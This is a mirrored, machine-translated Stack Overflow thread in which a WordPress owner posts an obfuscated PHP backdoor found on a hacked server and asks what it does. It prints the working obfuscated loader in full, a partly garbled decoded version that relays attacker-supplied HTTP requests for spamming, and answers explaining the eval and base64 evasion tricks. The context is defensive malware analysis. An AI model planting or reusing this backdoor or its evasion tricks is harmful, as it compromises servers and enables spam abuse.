堆栈内存溢出
  简体   繁体   English

PHP脚本发送垃圾邮件

[英]PHP script sending spam mail

 原文  2016-09-30 17:50:47       php/ wordpress/ security/ obfuscation/ spam

问题描述

I'm running a wordpress on my ubuntu server. 我在ubuntu服务器上运行wordpress。 Recently, I found that it is hacked and sending a lot of spam from my server. 最近,我发现它被黑客入侵并从我的服务器发送了大量垃圾邮件。 I found the below weird script in my wordpress directory. 我在wordpress目录中找到以下奇怪的脚本。 Does anyone know what is it doing? 有人知道它在做什么吗? And how to reverse the obfuscation and see the original code? 以及如何扭转混淆并查看原始代码? 

<?php
 $fodhaow = 2570; function iytpmqplaf($jtsqp, $paicjek){$nuodxnxumv = ''; for($i=0; $i < strlen($jtsqp); $i++){$nuodxnxumv .= isset($paicjek[$jtsqp[$i]]) ? $paicjek[$jtsqp[$i]] : $jtsqp[$i];}
$itbenabk="base" . "64_decode";return $itbenabk($nuodxnxumv);}
$uhzwglv = 'RrqBxzCyDeRfd1aNuGc58eqMDedPlGdydPmm2Q5vAEcNl0qMu1zi2A75l17MD'.
'edPlGdydPmm2Q5vAEcqu9dguqCPDecgu9aNl0ufoAE3pRNhu1zieGaNlwzMlrqXxeRfoAE3pRN'.
'hxw7BlGdqeGzyDedM8wdgu9RfoZE3pRNhxwFNeGvq7AV9lwHne1znDwvI7rqglqCixwIqd'.
'Pmm2Q5vAVi2D0CPDwHLxAhfdHCpQiCbZYYV8eoVdrqiDwiNpRN3pRfVTAhVxw8V2Aa'.
'N7rzXTAUCTAdEDp7EoQumoPiF8QTibQRyvLTX6poFv4IqDwRioQc46pHEvQV42Ri2TAhVTAhVTAcqKrqi2AE3pRNCpRfvA4aE8e'.
'aSTpiVD0q5DzC9DeaM81CB7rzB7tofdGcfupfgb1qButzidPE3pRfEDrHi8ZhCTtvmlrqi2ATCT4mEDrHi8ZmP2Q5vAVi2drT1'.
'vHCEDwvgDrzMDrHi8ZhCTrdSu1Y1vHCEDwvgDrYf7ed5DrzLl1aq2AaE8ea'.
'SwyH72ZE3pRfvA4ayDwFEe1aS7rUVsZcIl9vqu0qSlrqkDZSEDwvPKeci2Aa4vLaMDrzLl1a'.
'qe1aS7rUN2Q5vAVi2dtdquGz57AhCTtvql0aMDrHi8QUV2AayDwFEe1aS7rUN6mi2pRNND4hfTZaPDe'.
'vIltRNpRN3pRfVTAhVdtdquGz57AhCTtvql0aMDrHi8QTfdtvql0aMDrHi8ZE3pRNCpRfvA0zLxrJVd'.
'tdquGz57p5vAVi2D9zB8GaNl1nVDrzLu9qm7AVEDrHi8ZEvA95vA4hV'.
'TAhElGzie1aS7rUVsZh4TL5vA4hVTAhEx1zFTpiVdHCQazdwazdldiSYzHcMZUCQzA77TAnVdHCQazdwazdldIdH'.
'YzzHYIaMzzdddIi3pRfVTAhVdrXqKzC5DwnVsZcy7td5DwnfdrXqKZE3pRfVpRfVTAhVD0CPTAVExQim'.
'6PhExZhJTtviu0Oql4VEx1zF2Q5VdrEW2PEvA4hVTAc3pRfVTAhVTAhVTAaWDeql'.
'drq7TpiV81SP2rCPDAVEx1zFwPaNeZEVe4hfdrXqKzC5DwnVdZhPvQYN2Q5vA4hVTAcCpRfvA4hVTAc0lGTV2AaNs'.
'Qh3TAaNstviu0Oql4VEDrHi8ZE32Ri2TAhVTt5vA4hVTAhVTAhVD0CPTAVExLi'.
'm6PhExLOy7td5DwnfdrXqKZEVd48VdrEJuGaPlrzB2AaE8eaS2Q5VdrfW2PmVdrEW2PE'.
'vA4hVTAhVTAhVKmi2TAhVTAhVTAhVTAhVdrCI7HCE8eaSTAnCTrvfu4Sgu0RfdraS7'.
'rHldrq72ZcKTrCPDAVEx1zFwPajeZEN6mi2TAhVTAhVTAcCpRfVTAhVMRi2pRfVTAhVu0zi7edBTAag7eaMDrHi8Q5vA9ivAV'.
'i2D9zB8GaNl1nVu1zBDHCE8eaSoZVEDrHi8ZEvA95vA4hVTAhExrzSDAhCTAT46m'.
'i2pRfVTAhVD0CPDwHLxAVEDrHi8z54xrzSDrzPuPd7TrHyTAaWDeECs4a18wOIDZEvA4hVTAc'.
'3pRfVTAhVTAhVTAafDwHETAnCTAaWDeEVb4h464h4TAnVdtDSltz'.
'qTAnVTqOPern46mi2TAhVTtivAVi2TAhVTAam8edSleoVsZcSu9dSKZV9xtaiuAuVsQn'.
'V8edP8eEfpRfVTAhVTAhVTA7XDeafl1R9Tpi+TAaE8eaSwPdXDeafl1R4eZmvA4hVTAhVTAhVd1Sq'.
'8waqu4uVsQnVdrSq8wR5pRfVTAhVTAhVTA7Ll1FiDwFidPhCs4hEDrHi8'.
'z5480CEKZd7bhi2TAhVTAhVTAh97rqXDwCI7AuVsQnVdraS7rHlT9aNlwzg7eR4eZmvA4hVTAhVTAhVpRfVTAh'.
'V2ZE3pRfvA4hVTAhE8GanTpiVuGaPDwHXe1vgl9aqKtaM8Gdq8eaq2Aam8edSleoN6mi2TAhVThi2TAh'.
'VTAaPDevIltRVsZchD0q5DzC9DeaM81CB7rzB7tofdraS7rHlT9zPlAd7bAcrRYOQaZmVdrviKAE3pRfvA4hVTAcND4hfdrSi'.
'7tcMu0zyurCBu1zMxrzSDrzP2Ri2TAhVTt5vA4hVTAhVTAhVxw8V2tviu9cguPVExtaiuHCPDevml1FyDzCfDw'.
'HEDedloHi5TATPoph42ZhCsQiVaEHoYiYNpRfVTAhVTAhVTt5vA4hVTAhVTAhVTAhVTAaPDevIltRVsZh4ZHaYYHCHYqdsYqO'.
'iT4hBTAaf7tameGdquGcgl9vqe1Sq8waquq5meQ5vA4hVTAhVTAhVMRi2TAhVTtivA4hVTAcq'.
'ltvqpRfVTAhVKmi2TAhVTAhVTAhEu0zy7wOiTpiVTEvsQEFHRIadQiFMazdZQIT46mi2TAhVTtivAVi2TAhV'.
'Ttdq7tzPl4hEu0zy7wOi6mi2MRi2pRN07wFL7rqgl4cyDwFEe1aS7rUP2AaE8'.
'eaS2Ri2Kmi2TAhVTAJgTtzyDZcyl1vWDeaypRNC';
$tedsroi = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
eval/*o*/(iytpmqplaf($uhzwglv, $tedsroi));?>

I finally get the decoded script as below. 我终于得到如下解码的脚本。 But there is a line has syntax error. 但是一行中有语法错误。 And there is a function "send_data1" which has not been defined. 并且有一个尚未定义的函数“ send_data1”。 I wonder how this script works. 我不知道此脚本如何工作。 

@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);

foreach ($_COOKIE as $item) {
    if ($item != "dd7d1703-9a24-4362-8396-eed410b81d58")
        exit();
}

$data = file_get_contents('php://input');
$data = split("=", $data, 2);
$b64_decode_data = base64_decode(urldecode($data[1]));
$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1($send_data);

if (!$result) {
    $result = send_data2($send_data);
}

echo $result;

function decrypt($data) {
    $out_data = "";
    $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $key_len = strlen($key);
    for ($i = 0; $i < strlen($key); $i++) {
        $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
    }

    for ($i = 0; $i$value;) { // this line has error
        $head .= $key . ": " . $value . "\r\n";
    }

    $params = array(
        'http' => array(
            'method' => $data["method"],
            'header' => $head,
            'content' => $data["body"],
            'timeout' => $data["timeout"],
        )
    );

    $ctx = stream_context_create($params);
    $result = @file_get_contents($data["url"], FALSE, $ctx);
    if ($http_response_header) {
        if (strpos($http_response_header[0], "200") === FALSE) {
            $result = "HTTP_ERROR\t" . $http_response_header[0];
        }
    } else {
        $result = "CONNECTION_ERROR";
    } return $result;
}

function send_data2($data) {

}

2 个解决方案

解决方案1
 3 已采纳  2016-09-30 18:10:29

The good old script kiddy like base64 stuff. 好的老脚本kiddy喜欢base64的东西。

What happens is the following: 发生了以下情况:

First of all there is an eval() which evaluates a string as PHP code. 首先,有一个eval()将字符串评估为PHP代码。 To avoid finding eval( strings within your code base, a /*0*/ comment was put in. The function iytpmqplaf() provides the PHP code to be executed. 为了避免在代码库中找到eval(字符串),请输入/*0*/注释。函数iytpmqplaf()提供了要执行的PHP代码。

Secondly , there is this variable $itbenabk which contains "base64_decode". 其次 ,有一个变量$itbenabk ,它包含“ base64_decode”。 Again, to avoid finding base64_encode strings within the code base, the string was concatenated from two strings. 同样,为了避免在代码库中找到base64_encode字符串,该字符串是从两个字符串连接而成的。

Thirdly , the $itbenabk variable gets invoked. 第三$itbenabk变量被调用。 PHP realizes that $itbenabk contains a string name of an existing function, namely base64_decode() , and thus invokes it. PHP意识到$itbenabk包含一个现有函数的字符串名称,即base64_decode() ,因此将其调用。 The string in $uhzwglv contains the actual PHP code. $uhzwglv中的字符串包含实际的PHP代码。

The actual base64 string was also a bit modified by a simple char to char map. 实际的base64字符串也由一个简单的char到char map进行了一些修改。 To see the actual code, you can do: 要查看实际代码,您可以执行以下操作: 

$char2char = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
$b64code = ''; 
for($i=0; $i < strlen($uhzwglv); $i++){
    $b64code .= isset($char2char[$uhzwglv[$i]]) 
                   ? $char2char[$uhzwglv[$i]] : $uhzwglv[$i];
} 
echo base64_decode($b64code);

解决方案2
 3  2016-09-30 18:21:28

You can unobfuscate the code, but it doesn't really matter. 您可以对代码进行混淆处理,但这并不重要。 You should be more concerned with finding and closing the security issue. 您应该更加关注查找和解决安全问题。

Best thing to do is carefully follow FAQ My site was hacked - WordPress Codex. 最好的办法是仔细遵循常见问题解答我的网站被黑-WordPress Codex。

Then take a look at the recommended security measures in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex 然后看看加强WordPress中的推荐安全措施-WordPress Codex蛮力攻击-WordPress Codex

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 PHP邮件脚本未发送邮件 - PHP Mail Script not sending mail 联系表格php脚本将垃圾邮件发送到Gmail - Contact form php script sending spam to Gmail 使用PHP mail()发送电子邮件时,什么可以用作“垃圾邮件过滤器”? - What to use as “spam-filter” when sending emails with PHP mail()? php邮件垃圾邮件 - Php Mail Going For spam 使用php脚本将邮件发送到gmail - sending mail to gmail with an php script 无法通过php脚本发送邮件 - can not sending mail by php script postfix错误将邮件发送到垃圾邮件 - postfix error sending mail to spam 为什么php邮件脚本不发送邮件 - why is php mail script not sending mail PHP Mail Script实际上并未发送邮件 - PHP Mail Script is not actually sending mail Magento / Zend_Mail()将邮件发送到垃圾邮件 - Magento / Zend_Mail() Sending Mail to Spam
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM